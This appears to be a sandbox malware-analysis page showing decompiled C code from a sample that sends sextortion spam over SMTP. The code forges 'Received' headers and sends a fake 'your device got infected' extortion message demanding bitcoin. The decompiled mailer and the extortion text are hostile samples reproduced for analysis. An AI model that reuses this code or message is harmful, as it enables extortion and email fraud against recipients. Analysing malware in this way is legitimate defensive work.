                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901c27
                                                                                                                                                                                                                                                                  0x00901c27
                                                                                                                                                                                                                                                                  0x00901c37
                                                                                                                                                                                                                                                                  0x00901c3d
                                                                                                                                                                                                                                                                  0x00901c40
                                                                                                                                                                                                                                                                  0x00901c46
                                                                                                                                                                                                                                                                  0x00901c4d
                                                                                                                                                                                                                                                                  0x00901c58
                                                                                                                                                                                                                                                                  0x00901c62
                                                                                                                                                                                                                                                                  0x00901c70
                                                                                                                                                                                                                                                                  0x00901c64
                                                                                                                                                                                                                                                                  0x00901c64
                                                                                                                                                                                                                                                                  0x00901c64
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901cab
                                                                                                                                                                                                                                                                  0x00901cab
                                                                                                                                                                                                                                                                  0x00901cc9
                                                                                                                                                                                                                                                                  0x00901ccf
                                                                                                                                                                                                                                                                  0x00901cdd
                                                                                                                                                                                                                                                                  0x00901cea
                                                                                                                                                                                                                                                                  0x00901cf2
                                                                                                                                                                                                                                                                  0x00901cfb
                                                                                                                                                                                                                                                                  0x00901d0a
                                                                                                                                                                                                                                                                  0x00901d11
                                                                                                                                                                                                                                                                  0x00901d16
                                                                                                                                                                                                                                                                  0x00901d17
                                                                                                                                                                                                                                                                  0x00901d1c
                                                                                                                                                                                                                                                                  0x00901d1c
                                                                                                                                                                                                                                                                  0x00901d22
                                                                                                                                                                                                                                                                  0x00901d27
                                                                                                                                                                                                                                                                  0x00901d28
                                                                                                                                                                                                                                                                  0x00901d2d
                                                                                                                                                                                                                                                                  0x00901d2d
                                                                                                                                                                                                                                                                  0x00901d33
                                                                                                                                                                                                                                                                  0x00901d38
                                                                                                                                                                                                                                                                  0x00901d39
                                                                                                                                                                                                                                                                  0x00901d3e
                                                                                                                                                                                                                                                                  0x00901d3e
                                                                                                                                                                                                                                                                  0x00901d44
                                                                                                                                                                                                                                                                  0x00901d49
                                                                                                                                                                                                                                                                  0x00901d4a
                                                                                                                                                                                                                                                                  0x00901d4f
                                                                                                                                                                                                                                                                  0x00901d6c
                                                                                                                                                                                                                                                                  0x00901d73
                                                                                                                                                                                                                                                                  0x00901d79
                                                                                                                                                                                                                                                                  0x00901d7c
                                                                                                                                                                                                                                                                  0x00901d82
                                                                                                                                                                                                                                                                  0x00901d90
                                                                                                                                                                                                                                                                  0x00901d94
                                                                                                                                                                                                                                                                  0x00901d9e
                                                                                                                                                                                                                                                                  0x00901dac
                                                                                                                                                                                                                                                                  0x00901dc5
                                                                                                                                                                                                                                                                  0x00901dce
                                                                                                                                                                                                                                                                  0x00901ddc
                                                                                                                                                                                                                                                                  0x00901de3
                                                                                                                                                                                                                                                                  0x00901de9
                                                                                                                                                                                                                                                                  0x00901dec
                                                                                                                                                                                                                                                                  0x00901df9
                                                                                                                                                                                                                                                                  0x00901e00
                                                                                                                                                                                                                                                                  0x00901e04
                                                                                                                                                                                                                                                                  0x00901e0e
                                                                                                                                                                                                                                                                  0x00901e25
                                                                                                                                                                                                                                                                  0x00901e2c
                                                                                                                                                                                                                                                                  0x00901e32
                                                                                                                                                                                                                                                                  0x00901e35
                                                                                                                                                                                                                                                                  0x00901e3b
                                                                                                                                                                                                                                                                  0x00901e49
                                                                                                                                                                                                                                                                  0x00901e4d
                                                                                                                                                                                                                                                                  0x00901e57
                                                                                                                                                                                                                                                                  0x00901e65
                                                                                                                                                                                                                                                                  0x00901e75
                                                                                                                                                                                                                                                                  0x00901e7b
                                                                                                                                                                                                                                                                  0x00901e7e
                                                                                                                                                                                                                                                                  0x00901e84
                                                                                                                                                                                                                                                                  0x00901e8b
                                                                                                                                                                                                                                                                  0x00901ea0
                                                                                                                                                                                                                                                                  0x00901eb8
                                                                                                                                                                                                                                                                  0x00901ebf
                                                                                                                                                                                                                                                                  0x00901ec5
                                                                                                                                                                                                                                                                  0x00901ec8
                                                                                                                                                                                                                                                                  0x00901ece
                                                                                                                                                                                                                                                                  0x00901edc
                                                                                                                                                                                                                                                                  0x00901eea
                                                                                                                                                                                                                                                                  0x00901ef8
                                                                                                                                                                                                                                                                  0x00901f0b
                                                                                                                                                                                                                                                                  0x00901f11
                                                                                                                                                                                                                                                                  0x00901f14
                                                                                                                                                                                                                                                                  0x00901f1a
                                                                                                                                                                                                                                                                  0x00901f21
                                                                                                                                                                                                                                                                  0x00901f36
                                                                                                                                                                                                                                                                  0x00901f44
                                                                                                                                                                                                                                                                  0x00901f4b
                                                                                                                                                                                                                                                                  0x00901f66
                                                                                                                                                                                                                                                                  0x00901f74
                                                                                                                                                                                                                                                                  0x00901f7b
                                                                                                                                                                                                                                                                  0x00901f81
                                                                                                                                                                                                                                                                  0x00901f84
                                                                                                                                                                                                                                                                  0x00901f8a
                                                                                                                                                                                                                                                                  0x00901f98
                                                                                                                                                                                                                                                                  0x00901fa6
                                                                                                                                                                                                                                                                  0x00901fbb
                                                                                                                                                                                                                                                                  0x00901fc9
                                                                                                                                                                                                                                                                  0x00901fec
                                                                                                                                                                                                                                                                  0x00902008
                                                                                                                                                                                                                                                                  0x00902015
                                                                                                                                                                                                                                                                  0x00902030
                                                                                                                                                                                                                                                                  0x00902044
                                                                                                                                                                                                                                                                  0x00902051
                                                                                                                                                                                                                                                                  0x00902080
                                                                                                                                                                                                                                                                  0x0090208d
                                                                                                                                                                                                                                                                  0x009020bc
                                                                                                                                                                                                                                                                  0x009020c9
                                                                                                                                                                                                                                                                  0x009020f8
                                                                                                                                                                                                                                                                  0x00902105
                                                                                                                                                                                                                                                                  0x0090211d
                                                                                                                                                                                                                                                                  0x0090212b
                                                                                                                                                                                                                                                                  0x00902136
                                                                                                                                                                                                                                                                  0x0090212d
                                                                                                                                                                                                                                                                  0x0090212d
                                                                                                                                                                                                                                                                  0x0090212d
                                                                                                                                                                                                                                                                  0x00901fee
                                                                                                                                                                                                                                                                  0x00901fee
                                                                                                                                                                                                                                                                  0x00901fee
                                                                                                                                                                                                                                                                  0x00901fcb
                                                                                                                                                                                                                                                                  0x00901fcb
                                                                                                                                                                                                                                                                  0x00901fcb
                                                                                                                                                                                                                                                                  0x00901fa8
                                                                                                                                                                                                                                                                  0x00901fa8
                                                                                                                                                                                                                                                                  0x00901fa8
                                                                                                                                                                                                                                                                  0x00901f38
                                                                                                                                                                                                                                                                  0x00901f38
                                                                                                                                                                                                                                                                  0x00901f38
                                                                                                                                                                                                                                                                  0x00901eec
                                                                                                                                                                                                                                                                  0x00901eec
                                                                                                                                                                                                                                                                  0x00901eec
                                                                                                                                                                                                                                                                  0x00901ea2
                                                                                                                                                                                                                                                                  0x00901ea2
                                                                                                                                                                                                                                                                  0x00901ea2
                                                                                                                                                                                                                                                                  0x00901e59
                                                                                                                                                                                                                                                                  0x00901e59
                                                                                                                                                                                                                                                                  0x00901e59
                                                                                                                                                                                                                                                                  0x00901e10
                                                                                                                                                                                                                                                                  0x00901e10
                                                                                                                                                                                                                                                                  0x00901e10
                                                                                                                                                                                                                                                                  0x00901da0
                                                                                                                                                                                                                                                                  0x00901da0
                                                                                                                                                                                                                                                                  0x00901da0
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0090213f
                                                                                                                                                                                                                                                                  0x00902146
                                                                                                                                                                                                                                                                  0x0090214a
                                                                                                                                                                                                                                                                  0x00902152
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901af1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901af1
                                                                                                                                                                                                                                                                  0x00901acb
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901acb
                                                                                                                                                                                                                                                                  0x00901ac9
                                                                                                                                                                                                                                                                  0x0090215e
                                                                                                                                                                                                                                                                  0x00902167
                                                                                                                                                                                                                                                                  0x00902170
                                                                                                                                                                                                                                                                  0x0090217a
                                                                                                                                                                                                                                                                  0x00902186
                                                                                                                                                                                                                                                                  0x00902186

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00901120: lstrlenA.KERNEL32(?), ref: 0090112D
                                                                                                                                                                                                                                                                    • Part of subcall function 00901120: send.WS2_32(?,?,000000FF,00000000), ref: 00901144
                                                                                                                                                                                                                                                                  • shutdown.WS2_32(000000FF,00000002), ref: 00902170
                                                                                                                                                                                                                                                                  • closesocket.WS2_32(000000FF), ref: 0090217A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.518157757.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518125135.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518254273.0000000000904000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518294900.0000000000905000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_900000_2350331867.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: closesocketlstrlensendshutdown
                                                                                                                                                                                                                                                                  • String ID: DATA
                                                                                                                                                                                                                                                                  • API String ID: 317823648-550793329
                                                                                                                                                                                                                                                                  • Opcode ID: 3a236ea748851c87e55bcec4f5ff43d2995f85f8256506fd38ff4e2c17723518
                                                                                                                                                                                                                                                                  • Instruction ID: a9d8bb09806de137ec197bdc03b1a7af2689d800bbed7bfa677c86ec22af4f5b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a236ea748851c87e55bcec4f5ff43d2995f85f8256506fd38ff4e2c17723518
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82017C71D08328DFDF50CBA4DC4DBAEB7B9BB48318F004699E615B22C0D7794655CB11
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 332 90213f-902152 call 901120 335 902159 332->335 337 901a9a-901a9e 335->337 338 90215e-90217a shutdown closesocket 335->338 337->338 339 901aa4-901ab4 call 901160 337->339 342 902180-902186 338->342 343 901ab9-901ac9 339->343 344 901ad0-901aef call 9011c0 343->344 345 901acb 343->345 348 901af1 344->348 349 901af6-901b15 344->349 345->338 348->338 349->335 350 901b1b 349->350 350->335
                                                                                                                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                                                                                                                  			E0090213F(void* __eflags) {
                                                                                                                                                                                                                                                                  				intOrPtr _t159;
                                                                                                                                                                                                                                                                  				void* _t160;
                                                                                                                                                                                                                                                                  				void* _t182;
                                                                                                                                                                                                                                                                  				void* _t184;
                                                                                                                                                                                                                                                                  				void* _t185;
                                                                                                                                                                                                                                                                  				void* _t187;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				L0:
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					L0:
                                                                                                                                                                                                                                                                  					E00901120( *((intOrPtr*)(_t182 - 0x1c)), "QUIT", 0xffffffff); // executed
                                                                                                                                                                                                                                                                  					_t185 = _t184 + 0xc;
                                                                                                                                                                                                                                                                  					 *(_t182 - 0x20) = 8;
                                                                                                                                                                                                                                                                  					L46:
                                                                                                                                                                                                                                                                  					while( *(_t182 - 0x20) != 0 &&  *(_t182 - 0x20) != 8) {
                                                                                                                                                                                                                                                                  						_t159 = E00901160( *((intOrPtr*)(_t182 - 0x1c)), _t182 - 0x490, 0x400); // executed
                                                                                                                                                                                                                                                                  						_t187 = _t185 + 0xc;
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t182 - 0x90)) = _t159;
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)(_t182 - 0x90)) != 0) {
                                                                                                                                                                                                                                                                  							L5:
                                                                                                                                                                                                                                                                  							 *((char*)(_t182 +  *((intOrPtr*)(_t182 - 0x90)) - 0x490)) = 0;
                                                                                                                                                                                                                                                                  							_t160 = E009011C0(_t182 - 0x490);
                                                                                                                                                                                                                                                                  							_t185 = _t187 + 4;
                                                                                                                                                                                                                                                                  							if(_t160 != 0) {
                                                                                                                                                                                                                                                                  								L7:
                                                                                                                                                                                                                                                                  								 *(_t182 - 0x718) =  *(_t182 - 0x20);
                                                                                                                                                                                                                                                                  								 *(_t182 - 0x718) =  *(_t182 - 0x718) - 1;
                                                                                                                                                                                                                                                                  								if( *(_t182 - 0x718) > 6) {
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								L8:
                                                                                                                                                                                                                                                                  								switch( *((intOrPtr*)( *(_t182 - 0x718) * 4 +  &M00902188))) {
                                                                                                                                                                                                                                                                  									case 0:
                                                                                                                                                                                                                                                                  										L9:
                                                                                                                                                                                                                                                                  										_push("ESMTP");
                                                                                                                                                                                                                                                                  										if(StrStrA(_t182 - 0x490) == 0) {
                                                                                                                                                                                                                                                                  											_t164 = wsprintfA(_t182 - 0x490, "HELO %s\r\n", "[84.17.52.51]");
                                                                                                                                                                                                                                                                  											_t188 = _t185 + 0xc;
                                                                                                                                                                                                                                                                  											 *(_t182 - 0x494) = _t164;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											_t167 = wsprintfA(_t182 - 0x490, "EHLO %s\r\n", "[84.17.52.51]");
                                                                                                                                                                                                                                                                  											_t188 = _t185 + 0xc;
                                                                                                                                                                                                                                                                  											 *(_t182 - 0x494) = _t167;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										_t166 = E00901120( *((intOrPtr*)(_t182 - 0x1c)), _t182 - 0x490,  *(_t182 - 0x494)); // executed
                                                                                                                                                                                                                                                                  										_t185 = _t188 + 0xc;
                                                                                                                                                                                                                                                                  										if(_t166 != 0) {
                                                                                                                                                                                                                                                                  											 *(_t182 - 0x20) = 3;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(_t182 - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 1:
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 2:
                                                                                                                                                                                                                                                                  										L16:
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp + 8);
                                                                                                                                                                                                                                                                  										__ecx = __ebp - 0x88;
                                                                                                                                                                                                                                                                  										__eax = wsprintfA(__ebp - 0x88, "<%s>",  *(__ebp + 8));
                                                                                                                                                                                                                                                                  										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  										__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  										__eax = wsprintfA(__ebp - 0x490, "MAIL FROM: %s\r\n", __ebp - 0x88);
                                                                                                                                                                                                                                                                  										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  										 *(__ebp - 0x498) = __eax;
                                                                                                                                                                                                                                                                  										__ecx =  *(__ebp - 0x498);
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x498)); // executed
                                                                                                                                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 4;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 3:
                                                                                                                                                                                                                                                                  										L19:
                                                                                                                                                                                                                                                                  										__ecx =  *(__ebp + 8);
                                                                                                                                                                                                                                                                  										__eax = wsprintfA(__ebp - 0x490, "RCPT TO: <%s>\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                  										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  										 *(__ebp - 0x49c) = __eax;
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp - 0x49c);
                                                                                                                                                                                                                                                                  										__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x49c)); // executed
                                                                                                                                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 5;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 4:
                                                                                                                                                                                                                                                                  										L22:
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), "DATA\r\n", 0xffffffff); // executed
                                                                                                                                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 6;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 5:
                                                                                                                                                                                                                                                                  										L25:
                                                                                                                                                                                                                                                                  										__ecx = __ebp - 0x61c;
                                                                                                                                                                                                                                                                  										E00901320(__ebp - 0x61c, 5, __ebp - 0x61c) = wsprintfA(__ebp - 0x508, "%s.com", __eax);
                                                                                                                                                                                                                                                                  										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  										__ebp - 0x710 = E00901490(0, __ebp - 0x710, 1); // executed
                                                                                                                                                                                                                                                                  										Sleep(0x7d0); // executed
                                                                                                                                                                                                                                                                  										__ecx = __ebp - 0x690;
                                                                                                                                                                                                                                                                  										__eax = E00901490(0, __ebp - 0x690, 0); // executed
                                                                                                                                                                                                                                                                  										__eax = __ebp - 0x508;
                                                                                                                                                                                                                                                                  										__eax = rand();
                                                                                                                                                                                                                                                                  										asm("cdq");
                                                                                                                                                                                                                                                                  										__ecx = 0xfe;
                                                                                                                                                                                                                                                                  										_t59 = __eax % 0xfe;
                                                                                                                                                                                                                                                                  										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                  										__eax = rand();
                                                                                                                                                                                                                                                                  										asm("cdq");
                                                                                                                                                                                                                                                                  										__ecx = 0xfe;
                                                                                                                                                                                                                                                                  										_t63 = __eax % 0xfe;
                                                                                                                                                                                                                                                                  										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                  										__eax = rand();
                                                                                                                                                                                                                                                                  										asm("cdq");
                                                                                                                                                                                                                                                                  										__ecx = 0xfe;
                                                                                                                                                                                                                                                                  										_t67 = __eax % 0xfe;
                                                                                                                                                                                                                                                                  										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                  										__eax = rand();
                                                                                                                                                                                                                                                                  										asm("cdq");
                                                                                                                                                                                                                                                                  										__ecx = 0xd2;
                                                                                                                                                                                                                                                                  										_t71 = __eax % 0xd2;
                                                                                                                                                                                                                                                                  										E00901390(0xd2, 7, __ebp - 0x6a8) = __ebp - 0x490;
                                                                                                                                                                                                                                                                  										__eax = wsprintfA(__ebp - 0x490, "Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s\r\n", __ebp - 0x490, _t71 + 1, _t67 + 1, _t63 + 1, _t59 + 1, __ebp - 0x508, __ebp - 0x690);
                                                                                                                                                                                                                                                                  										__esp = __esp + 0x24;
                                                                                                                                                                                                                                                                  										 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  										__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                                                                                                                                  											__ecx = __ebp - 0x710;
                                                                                                                                                                                                                                                                  											E00901320(__ecx, 3, __ebp - 0x628) = __ebp - 0x69c;
                                                                                                                                                                                                                                                                  											__eax = E00901320(__ecx, 5, __ebp - 0x69c);
                                                                                                                                                                                                                                                                  											__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                  											__eax = wsprintfA(__ebp - 0x490, "Received: (qmail %s invoked by uid %s); %s\r\n", __eax, __eax, __ebp - 0x490);
                                                                                                                                                                                                                                                                  											__esp = __esp + 0x14;
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  											__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  											__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  											__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                  											if(__eax != 0) {
                                                                                                                                                                                                                                                                  												__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  												__eax = wsprintfA(__ebp - 0x490, "From: %s\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                  												__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  												 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  												__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  												__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  												__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                  												if(__eax != 0) {
                                                                                                                                                                                                                                                                  													__ecx =  *(__ebp + 8);
                                                                                                                                                                                                                                                                  													__eax = wsprintfA(__ebp - 0x490, "To: %s\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                  													__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  													 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  													__eax =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  													__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                  													if(E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                  														__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  														__eax = wsprintfA(__ebp - 0x490, "Subject: %s\r\n", "READ OR GO TO JAIL!");
                                                                                                                                                                                                                                                                  														__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  														 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  														__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  														__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  														if(E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                  															__ecx = __ebp - 0x690;
                                                                                                                                                                                                                                                                  															__eax = wsprintfA(__ebp - 0x490, "Date: %s\r\n", __ebp - 0x690);
                                                                                                                                                                                                                                                                  															__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  															 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  															__eax =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  															__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                  															if(E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                  																__eax = __ebp - 0x508;
                                                                                                                                                                                                                                                                  																__ecx = __ebp - 0x628;
                                                                                                                                                                                                                                                                  																E00901320(__ecx, 6, __ecx) = E00901320(__ecx, 6, __ebp - 0x69c);
                                                                                                                                                                                                                                                                  																__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  																__eax = wsprintfA(__ebp - 0x490, "Message-ID: <%s.%s@%s>\r\n", __ebp - 0x490, __ebp - 0x490, __ebp - 0x508);
                                                                                                                                                                                                                                                                  																__esp = __esp + 0x14;
                                                                                                                                                                                                                                                                  																 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  																__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  																__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  																if(E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                  																	__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  																	if(E00901120( *(__ebp - 0x1c), "Mime-Version: 1.0\r\n", 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                  																		if(E00901120( *(__ebp - 0x1c), "Content-type: text/plain;\r\n\r\n", 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = memset(__ebp - 0x610, 0, 0x104);
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			strcpy(__ebp - 0x610, "Hi, I keep the whole story short.\r\n\r\n") = strcat(__ebp - 0x610, "Your device got infected with my private trojan, it gave me access to all your files, accounts and contacts.\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = strcat(__ebp - 0x610, "Check the sender of this email, I sent it from your email account.\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = strcat(__ebp - 0x610, "It won\'t take a long time to send your data with the proof of your activities to the police.\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = strcat(__ebp - 0x610, "My address is: bc1qfzlmekudmjnhj88yjl8277zkzu6v9c2r890fan\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = strcat(__ebp - 0x610, "Once I get the payment, I will remove everything, be sure, I keep my promises.\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			strcat(__ebp - 0x610, "Next time keep your device updated with the newest security patches.\r\n.\r\n") =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  																			if(E00901120( *(__ebp - 0x1c), __ebp - 0x610, 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                  																				 *(__ebp - 0x20) = 7;
                                                                                                                                                                                                                                                                  																			} else {
                                                                                                                                                                                                                                                                  																				 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  																			}
                                                                                                                                                                                                                                                                  																		} else {
                                                                                                                                                                                                                                                                  																			 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  																		}
                                                                                                                                                                                                                                                                  																	} else {
                                                                                                                                                                                                                                                                  																		 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  																	}
                                                                                                                                                                                                                                                                  																} else {
                                                                                                                                                                                                                                                                  																	 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  															} else {
                                                                                                                                                                                                                                                                  																 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  															}
                                                                                                                                                                                                                                                                  														} else {
                                                                                                                                                                                                                                                                  															 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  														}
                                                                                                                                                                                                                                                                  													} else {
                                                                                                                                                                                                                                                                  														 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  													}
                                                                                                                                                                                                                                                                  												} else {
                                                                                                                                                                                                                                                                  													 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  												}
                                                                                                                                                                                                                                                                  											} else {
                                                                                                                                                                                                                                                                  												 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 6:
                                                                                                                                                                                                                                                                  										goto L0;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L47:
                                                                                                                                                                                                                                                                  					 *(_t182 - 8) = 0 |  *(_t182 - 0x20) == 0x00000008;
                                                                                                                                                                                                                                                                  					__imp__#22( *((intOrPtr*)(_t182 - 0x1c)), 2); // executed
                                                                                                                                                                                                                                                                  					__imp__#3( *((intOrPtr*)(_t182 - 0x1c)));
                                                                                                                                                                                                                                                                  					return  *(_t182 - 8);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}









                                                                                                                                                                                                                                                                  0x0090213f
